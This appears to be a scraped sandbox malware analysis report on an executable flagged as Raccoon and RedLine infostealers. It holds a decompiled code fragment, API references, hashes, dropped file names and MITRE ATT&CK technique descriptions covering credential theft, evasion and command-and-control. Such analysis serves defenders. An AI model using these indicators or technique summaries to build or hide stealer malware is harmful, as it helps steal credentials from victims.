						_t82 =  *((intOrPtr*)( *0x40e18c))(_t77,  *0x40e258);
						if(_t82 == 0) {
							if(_a4 == 0) {
								_push(_t77);
								if(E0040A3E4(_t77,  &_v8, 0,  *((intOrPtr*)( *0x40e08c))()) != 0) {
									_t47 = E0040A503(_t52, _v12);
									_t70 = _v8;
									goto L9;
								}
							} else {
								_t47 = E0040A503(_t52, _v12);
								_t70 = _a4;
								L9:
								_t52 = E0040A503(_t47, _t70);
							}
							_t83 = _v20;
							 *_t83 =  *((intOrPtr*)( *0x40e13c))( *_t83, _t52);
							_t77 = 0;
						} else {
							_t85 = _t82 - _t77 >> 1;
							if(E0040A3E4(_t77,  &_v8, 0, _t85) != 0) {
								_t52 = E0040A503(E0040A503(_t52, _v12), _v8);
							}
							_t77 = _t77 + _t85 * 2 + 2;
						}
						LocalFree(_v8);
						_t54 = _v16;
					} while (_t77 != 0);
				}
				_t80 = _v20;
				 *_t80 =  *((intOrPtr*)( *0x40e13c))( *_t80, _t52);
				LocalFree(_t52);
				return 1;
			}

APIs

LocalAlloc.KERNEL32(00000040,00000000,?,00000000,00000000,?), ref: 0040A2D9
LocalAlloc.KERNEL32(00000040,00000000,?,00000000,00000000,?), ref: 0040A30C
LocalFree.KERNEL32(?,?,00000000,00000000,?), ref: 0040A3B5

Part of subcall function 0040A3E4: LocalAlloc.KERNEL32(00000040,00000000,?,0040870A,00000000,00000000,?,?,?,?,?,?,004079E3), ref: 0040A40C
Part of subcall function 0040A3E4: LocalFree.KERNEL32(00000000,?,0040870A,00000000,00000000,?,?,?,?,?,?,004079E3), ref: 0040A449

Part of subcall function 0040A503: lstrlenW.KERNEL32(?,00000000,?,00000000,00000000,?,00408633), ref: 0040A516
Part of subcall function 0040A503: lstrlenW.KERNEL32(?,?,00000000,?,00000000,00000000,?,00408633), ref: 0040A51D
Part of subcall function 0040A503: GlobalFree.KERNEL32(?), ref: 0040A550

LocalFree.KERNEL32(00000000,?,00000000,00000000,?), ref: 0040A3D6

Memory Dump Source

Source File: 00000017.00000002.366847792.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000017.00000002.367266584.0000000000410000.00000040.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_400000_kukurzka9000.jbxd

Yara matches

Similarity

API ID: Local$Free$Alloc$lstrlen$Global
String ID:
API String ID: 2107727554-0
Opcode ID: f075e1c407a2bf6e50d5205a2f9a31135d687d93ab644a6ad8db2f955380cc72
Instruction ID: 8d9fe808253cfd760579b52592682b105d53dbc0a4ab2c38afac3778b4664aea
Opcode Fuzzy Hash: f075e1c407a2bf6e50d5205a2f9a31135d687d93ab644a6ad8db2f955380cc72
Instruction Fuzzy Hash: 5A419572A00314EFDB14DFA5DD81AAE77B5EB88310F10497AE941B7390DBB89D20CB95

Uniqueness

Uniqueness Score: -1.00%

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to achieve execution. WMI is a Windows administration feature that provides a uniform environment for local and remote access to Windows system components. It relies on the WMI service for local and remote access and the server message block (SMB) and Remote Procedure Call Service (RPCS) for remote access. RPCS operates over port 135.
Tactics:	Execution
Data Sources:	Authentication logs, Netflow/Enclave netflow, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may directly interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	API monitoring, Loaded DLLs, Process monitoring, System calls
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse task scheduling functionality to facilitate initial or recurring execution of malicious code. Utilities exist within all major operating systems to schedule programs or scripts to be executed at a specified date and time. A task can also be scheduled on a remote system, provided the proper authentication is met (ex: RPC and file and printer sharing in Windows environments). Scheduling a task on a remote system typically requires being a member of an admin or otherwise privileged group on the remote system.
Tactics:	Execution, Persistence, Privilege Escalation
Data Sources:	File monitoring, Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse PowerShell commands and scripts for execution. PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system. Adversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code. Examples include the `Start-Process` cmdlet which can be used to run an executable and the `Invoke-Command` cmdlet which runs a command locally or on a remote computer (though administrator permissions are required to use PowerShell to connect to remote systems).
Tactics:	Execution
Data Sources:	DLL monitoring, File monitoring, Loaded DLLs, PowerShell logs, Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may achieve persistence by adding a program to a startup folder or referencing it with a Registry run key. Adding an entry to the "run keys" in the Registry or startup folder will cause the program referenced to be executed when a user logs in. These programs will be executed under the context of the user and will have the account's associated permissions level.
Tactics:	Persistence, Privilege Escalation
Data Sources:	File monitoring, Windows Registry
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may disable security tools to avoid possible detection of their tools and activities. This can take the form of killing security software or event logging processes, deleting Registry keys so that tools do not start at run time, or other methods to interfere with security tools scanning or reporting information.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Services, Windows Registry
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata
Platforms:	macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify file time attributes to hide new or changes to existing files. Timestomping is a technique that modifies the timestamps of a file (the modify, access, create, and change times), often to mimic files that are in the same folder. This is done, for example, on files that have been modified or created by the adversary so that they do not appear conspicuous to forensic investigators or file analysis tools.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse rundll32.exe to proxy execution of malicious code. Using rundll32.exe, vice executing directly (i.e. Shared Modules ), may avoid triggering security tools that may not monitor execution of the rundll32.exe process because of allowlists or false positives from normal operations. Rundll32.exe is commonly associated with executing DLL payloads.
Tactics:	Defense Evasion
Data Sources:	DLL monitoring, Loaded DLLs, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	API monitoring, PowerShell logs, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. Credential API Hooking ) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. Web Portal Capture ).
Tactics:	Collection, Credential Access
Data Sources:	API monitoring, Binary file metadata, DLL monitoring, Kernel drivers, Loaded DLLs, PowerShell logs, Process command-line parameters, Process monitoring, User interface, Windows Registry, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search the Registry on compromised systems for insecurely stored credentials. The Windows Registry stores configuration information that can be used by the system or other programs. Adversaries may query the Registry looking for credentials and passwords that have been stored for use by other programs or services. Sometimes these credentials are used for automatic logons.
Tactics:	Credential Access
Data Sources:	Process command-line parameters, Process monitoring, Windows Registry
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of accounts on a system or within an environment. This information can help adversaries determine which accounts exist to aid in follow-on behavior.
Tactics:	Discovery
Data Sources:	API monitoring, Azure activity logs, Office 365 account logs, Process command-line parameters, Process monitoring
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report WSkT8d093C.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Threatname: Raccoon

Threatname: RedLine

Yara Signatures

PCAP (Network Traffic)

Dropped Files

Memory Dumps

Unpacked PEs

Sigma Signatures

Snort Signatures

Joe Sandbox Signatures

AV Detection

Cryptography

Compliance

Spreading

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

Private

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Program Files (x86)\Company\NewProduct\F0geI.exe

C:\Program Files (x86)\Company\NewProduct\WW1.exe

C:\Program Files (x86)\Company\NewProduct\brokerius.exe

C:\Program Files (x86)\Company\NewProduct\captain09876.exe

C:\Program Files (x86)\Company\NewProduct\ffnameedit.exe

C:\Program Files (x86)\Company\NewProduct\jshainx.exe

C:\Program Files (x86)\Company\NewProduct\kukurzka9000.exe

C:\Program Files (x86)\Company\NewProduct\namdoitntn.exe

C:\Program Files (x86)\Company\NewProduct\ordo_sec666.exe

Windows Analysis Report
WSkT8d093C.exe

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to identify the primary user, currently logged in user, set of users that commonly uses a system, or whether a user is actively using the system. They may do this, for example, by retrieving account usernames or by using OS Credential Dumping . The information may be collected in a number of different ways using other Discovery techniques, because user and username details are prevalent throughout a system and include running process ownership, file/directory ownership, session information, and system logs. Adversaries may use the information from [System Owner/User Discovery](https://attack.mitre.org/techniques/T1033) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Files may be copied from an external adversary controlled system through the command and control channel to bring tools into the victim network or through alternate protocols with another tool such as FTP. Files can also be copied over on Mac and Linux with native tools like scp, rsync, and sftp.
Tactics:	Command and Control
Data Sources:	File monitoring, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process command-line parameters, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using a protocol and port paring that are typically not associated. For example, HTTPS over port 8088or port 587as opposed to the traditional port 443. Adversaries may make changes to the standard port used by a protocol to bypass filtering or muddle analysis/parsing of network data.
Tactics:	Command and Control
Data Sources:	Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Host network interface, Netflow/Enclave netflow, Network intrusion detection system, Network protocol analysis, Packet capture, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	DNS records, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre